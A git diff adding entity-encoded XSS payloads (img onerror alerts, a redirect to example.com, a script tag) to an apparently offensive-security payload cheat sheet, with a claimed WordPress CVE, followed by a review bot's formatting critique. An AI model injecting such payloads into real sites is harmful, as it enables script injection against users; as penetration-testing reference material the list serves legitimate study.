Nguyễn Tiến Dũng 2026-04-22 20:21:57 +09:00 committed by GitHub
commit 5100f1ef22
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```
### XSS using entity HTML
```javascript
// Works very good at Wordpress (CVE-2025-14588)
&lt;img src=x onerror=alert(1)&gt;
&lt;img src=x onerror=window.location.href="https://example.com"&gt;
&lt;img src=1 onerror=&quot;alert(1)&quot;&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
```
### XSS using HTML5 tags
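Review bot: the comment `// Works very good at Wordpress (CVE-2025-14588)` at the top of the new fence cites a CVE with no link and no statement of the precondition, so a reader cannot tell when these strings apply. As written, `&lt;img src=x onerror=alert(1)&gt;` renders as inert text unless the application decodes entities before writing the value into HTML. Suggest moving that comment out of the fence into one sentence of prose under the heading that states this condition and links the advisory, rewording it to "Works well on WordPress", and renaming the section "XSS using HTML entities". The block is tagged `javascript` although its content is entity-encoded HTML, so `html` is the better fence tag. A blank line is also needed between the preceding closing fence and the new `###` heading, and again before `### XSS using HTML5 tags`, so both headings render reliably.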